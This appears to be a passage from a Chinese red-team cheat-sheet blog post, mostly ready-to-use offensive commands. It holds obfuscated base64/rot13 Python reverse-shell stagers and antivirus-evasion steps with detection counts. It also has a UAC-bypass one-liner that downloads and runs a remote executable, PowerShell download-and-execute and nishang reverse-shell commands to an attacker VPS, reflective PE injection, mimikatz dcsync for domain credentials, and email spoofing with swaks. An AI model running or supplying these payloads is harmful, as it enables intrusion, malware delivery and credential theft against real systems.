import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguNzguMTI4Jyw5MjMzKSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg==')))

进行一次rot13编码:
import getpass,string
rot13 = str.maketrans("ABCDEFGHIJKLMabcdefghijklmNOPQRSTUVWXYZnopqrstuvwxyz","NOPQRSTUVWXYZnopqrstuvwxyzABCDEFGHIJKLMabcdefghijklm");

最后结果:
import getpass,base64,sys,string;rot13 = str.maketrans("ABCDEFGHIJKLMabcdefghijklmNOPQRSTUVWXYZnopqrstuvwxyz","NOPQRSTUVWXYZnopqrstuvwxyzABCDEFGHIJKLMabcdefghijklm");exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('nJ1jo3W0VUAiL2gyqPkmqUW1L3DfqTygMDczo3VtrPOcovOlLJ5aMFtkZPx6Pty0pax6PtxWpm1mo2AeMKDhp29wn2I0XQVfp29wn2I0YyACD0gsH1EFEHSAXDbWPKZhL29hozIwqPtbWmR5Zv4kAwthAmthZGV4Wlj5ZwZmXFxXPDyvpzIunjbWMKuwMKO0BtbWPKEcoJHhp2kyMKNbAFxXoQ1mqUW1L3DhqJ5jLJAeXPp+FFpfpl5lMJA2XQDcXIfjKDcxCKZhpzIwqvufXDc3nTyfMFOfMJ4bMPx8oQbXPJDeCKZhpzIwqvufYJkyovuxXFxXMKuyLluxYUfaplp6p30cPt=='.translate(rot13))))

生成exe:
python -m py2exe.build_exe start.py --bundle-files 0

golang

1
2
3
4

go build -ldflags "-w -s" 

msfconsole -x "use exploit/multi/handler;set payload windows/x64/meterpreter/reverse_tcp;set lhost 0.0.0.0;set lport 3232;exploit"

https://weekly-geekly.github.io/articles/459168/index.html

AVIator

使用cs配合AVIator生成免杀文件

使用方法查看github usage
转换c#,代码比较糙

1
2
3
4
5
import re
f=open('payload.cs','r').read()
result=re.findall(r'{(.*)}',f)[0].replace(' ','') 
for i in range(0,len(result),80):
    print(result[i:i+80])

微步 0/24
国内查杀情况
virustotal 17/68
21.png
比作者6个月前的检出率高很多了。。。

https://github.com/Ch0pin/AVIator

ps1

1
set-executionpolicy remotesigned   #若使用出现报错先开启权限,需要管理员权限

uac bypass

一键反弹shell

1
powershell -Windowstyle Hidden Start-BitsTransfer -Priority foreground -Source 'https://github.com/IVorder/f_list/raw/master/calc.exe' -Destination "C:\Windows\Temp\prox.exe";New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force;New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force;Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "C:\Windows\Temp\prox.exe" -Force;Start-Process "C:\Windows\System32\ComputerDefaults.exe"

1
2
3
4
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
Start-Process "C:\Windows\System32\ComputerDefaults.exe"

清除
Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse

https://github.com/redcanaryco/atomic-red-team

添加user

https://xz.aliyun.com/t/4078

gcc adduser.c -l netapi32 -o adduser64.exe
https://github.com/jas502n/adduser

提权(powershell)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
echo ^$d = New-Object System.Net.WebClient >> c:\KRECYCLE\1.ps1 
& echo ^$d.DownloadFile(^"http://127.0.0.1/others/
64.exe^",^"c:\KRECYCLE\3.exe^") >> c:\KRECYCLE\1.ps1

powershell -ExecutionPolicy Bypass -File c:\KRECYCLE\1.ps1

VPS 
nc -vlp 8888 

反弹powershell的shell 
powershell IEX (New-Object Net.WebClient).DownloadString('https://
raw.githubusercontent.com/samratashok/nishang/
9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/InvokePowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress VpsIp -
port 8888

加载远程的exe到内存中执行,从而绕过杀软

1
2
3
4
IEX (New-Object Net.WebClient).DownloadString('https://
raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/
CodeExecution/Invoke-ReflectivePEInjection.ps1');InvokeReflectivePEInjection -PEUrl http://vpsip/down/ms16-032_x64.exe -
ExeArgs 'whoami' -ForceASLR

powershell目录:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

域渗透

影响范围:windows server

权限:
域管理员可登陆域下任意主机
域权限能够读取本地文件

入侵主机后 查看 net group/domain

工具:
cain
mimikatz
chromepass

提权漏洞:
cve-2019-10040

获取域管后

1
2
C:\Windows\NTDS\NTDS.dit  #获取到域所以用户的密码
lsadump::dcsync /domain:pentestlab.local /all /csv  #mimikatz

红蓝总结

redteam细节

代理池

秒拨技术

https://cuiqingcai.com/4596.html

钓鱼

伪造邮箱
nslookup -type=txt 163.com 查看目标邮件防护措施
swaks --data aaa.eml--h-from "=?gb18030?B?x+XLrg==?=<admin@qq.com>" --from bbb@vul.com --to 11@qq.com --server mail.vul.com -au user -ap pass

https://www.jianshu.com/p/671bce334ea7

c2隐藏

http://test666.me/archives/227/
https://xz.aliyun.com/t/4509

https://github.com/jas502n/RedTeam-BCS
https://evilwing.me/2019/04/14/redteam-gong-ji-ji-qiao-he-an-quan-fang-yu/

漏洞库

Exploits & Shellcodes: https://github.com/offensive-security/exploitdb
Binary Exploits: https://github.com/offensive-security/exploitdb-bin-sploits
Papers: https://github.com/offensive-security/exploitdb-papers

日志清扫

工具

文件伪造

md5 伪造

支持伪造:

  • pdf
  • jpg
  • png
  • mp4
  • pe
  • jp2

使用方法:如图所示(其余script类同)
1.png

md5文件伪造:工具地址

关于pdf生成:

  • pocs/pdf/中提供图片(jpg/png)/文字转换pdf
  • 或者使用word打印转换pdf

[!] pdf.py需要先安装mutool工具

1
apt-get install mupdf-tools

应急响应

安全检查脚本:https://github.com/T0xst/linux

总结

cnvd共享库

http://www.cnvd.org.cn/shareData/list

[+]漏洞挖掘

  • 框架
  • 中间件
  • 协议
  • 加密算法
  • 语言

函数细节:

  • 安全面
    – 小众函数 导致的绕过
    – 编码类型 导致的绕过
    – 解析调用 导致的绕过
    – 特性+正常函数组合调用

[+]利用链思路

  • 漏洞扩大
    – 多漏洞组合

-蜜罐
– 读取信息?
– rce?
– 污染攻击脚本(源端),通过攻击脚本传播恶意文件

原文作者:Vorder

原文链接:http://Vorders.me/2018/12/27/知识索引/

发表日期:十二月 27日 2018, 9:49:01 上午

更新日期:May 13th 2020, 9:34:45 am

版权声明:本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

CATALOG
  1. 1. 并且会持续更新……
  • 知识补充
    1. 1. 备忘
    2. 2. docker备忘
    3. 3. 密码学知识
      1. 3.1. md5
  • 信息收集
    1. 1. 域名搜集
    2. 2. archive.org
    3. 3. google && github hack
    4. 4. 端口扫描
      1. 4.1. TCP SYN SCAN
    5. 5. CDN
      1. 5.1. CDN绕过查找真实ip
    6. 6. 信息泄露
      1. 6.1. git泄露
      2. 6.2. svn 泄露
      3. 6.3. BAZAAR 泄露
      4. 6.4. api key 泄露
  • 漏洞挖掘
    1. 1. PHP
      1. 1.1. 验证码漏洞
      2. 1.2. 文件包含(LFI) bypass
      3. 1.3. 反序列化
      4. 1.4. php反射调用
    2. 2. xpath 注入
    3. 3. web缓存欺骗攻击
    4. 4. xss
      1. 4.1. 各种技巧
      2. 4.2. xss in markdown/SVG/XML/files
      3. 4.3. self-xss的利用
      4. 4.4. ctf中常见xss读文件
    5. 5. CORS学习
    6. 6. sockets 攻击
    7. 7. SSO 单点登录
      1. 7.1. SAML 注入
    8. 8. OAuth
    9. 9. LaTeX 注入
    10. 10. csv 注入
    11. 11. no sql
    12. 12. GraphQL 注入
    13. 13. mysql
      1. 13.1. 报错
      2. 13.2. order by 盲注
      3. 13.3. 子查询
      4. 13.4. dns 通道的盲注
      5. 13.5. mysql 客户端文件读取
      6. 13.6. sql bypass方法
      7. 13.7. 常规
    14. 14. XXE bypass
      1. 14.1. soap xxe
      2. 14.2. doc或xlsx包含xxe
    15. 15. 文件上传
      1. 15.1. 文件上传使用oss存储
      2. 15.2. 文件上传 bypass
    16. 16. rest test
    17. 17. nodejs
      1. 17.1. JavaScript 原型链污染
    18. 18. python
      1. 18.1. ssti
      2. 18.2. flask session漏洞
      3. 18.3. 格式化字符串
        1. 18.3.1. f修饰符与任意代码执行
    19. 19. redirect
    20. 20. hadoop
  • 漏洞利用
  • 权限提升
    1. 1. waf bypass
      1. 1.1. 命令注入(linux)
      2. 1.2. 命令注入(windows):
        1. 1.2.1. 命令注入 bypass技巧汇总
          1. 1.2.1.1. 关键词过滤
          2. 1.2.1.2. 空格过滤
          3. 1.2.1.3. 空白,链接字符绕过
          4. 1.2.1.4. n > file分段写入
        2. 1.2.2. 进制编码
        3. 1.2.3. 基于时间
        4. 1.2.4. 多语言命令注入
      3. 1.3. SSRF(bypass)
      4. 1.4. CRLF bypass
      5. 1.5. 重定向 bypass
  • 后门
    1. 1. webshell免杀(PHP)
    2. 2. cs入门
    3. 3. 横向
      1. 3.1. 转发
      2. 3.2. mysql 相关
      3. 3.3. window相关
      4. 3.4. powershell相关
      5. 3.5. msf相关
      6. 3.6. vpn password get
    4. 4. 免杀shellcode
      1. 4.1. python msf bypass
      2. 4.2. AVIator
      3. 4.3. ps1
    5. 5. uac bypass
      1. 5.1. 添加user
    6. 6. 提权(powershell)
      1. 6.1. 域渗透
  • 红蓝总结
    1. 1. redteam细节
    2. 2. 代理池
    3. 3. 钓鱼
      1. 3.1. c2隐藏
  • 漏洞库
  • 日志清扫
  • 工具
    1. 1. 文件伪造
      1. 1.1. md5 伪造
  • 应急响应
  • 总结
    • Total : 11
    2020
    2019
    2018
    CVE-2017-7921 漏洞利用 vulub 合约 ELK sem-cms 漏洞挖掘 信息搜集 知识积累 主机检测点索引 端口渗透tips hw 以太坊 contract 智能合约 合约安全 索引 bypass cors xss bypass upload file webshell bypass md5文件伪造 flask session 命令执行bypass 反序列化 sqli bypass shellcode bypass configurationFile